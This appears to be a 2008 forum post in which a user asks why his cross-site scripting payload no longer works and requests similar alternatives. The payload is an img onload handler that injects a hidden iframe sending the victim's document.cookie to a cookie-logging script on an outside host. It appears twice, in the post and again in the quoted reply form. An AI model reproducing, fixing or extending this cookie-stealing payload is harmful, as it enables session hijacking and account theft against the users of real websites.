xss code - not working, but used to.

[Reply] [View by Thread] [Help]
[Back To Programming]

So I can't figure out why the exploit below won't work on my test server. I think it worked when I first started writing the paper on xss exploits (over a year ago), but it won't anymore. The onload function doesn't work at all, and the src of the iframe won't access the document.cookie.

<img src='http://www.externalhost.com/pixel.gif' onload='javascript:document.write("<iframe width=1
height=1 scrolling=no src='http://www.externalhost.com/cookielogger.php?cookie='+unescape(document.cookie)>")'>

Any guesses as to why this won't work? Small and similar alternatives? Thanks

There are no replies to this post yet.

Guest:
Subject:
Message:	On 2008-10-05 23:48:23, Mason wrote >So I can't figure out why the exploit below won't work on my test server. I think it worked when I first started writing the paper on xss exploits (over a year ago), but it won't anymore. The onload function doesn't work at all, and the src of the iframe won't access the document.cookie. > ><img src='http://www.externalhost.com/pixel.gif' onload='javascript:document.write("<iframe width=1 >height=1 scrolling=no src='http://www.externalhost.com/cookielogger.php?cookie='+unescape(document.cookie)>")'> > >Any guesses as to why this won't work? Small and similar alternatives? Thanks
Signature:
Optional Image Link:
http://

CyberArmy::Forum v0.6
Generated In 0.01102 seconds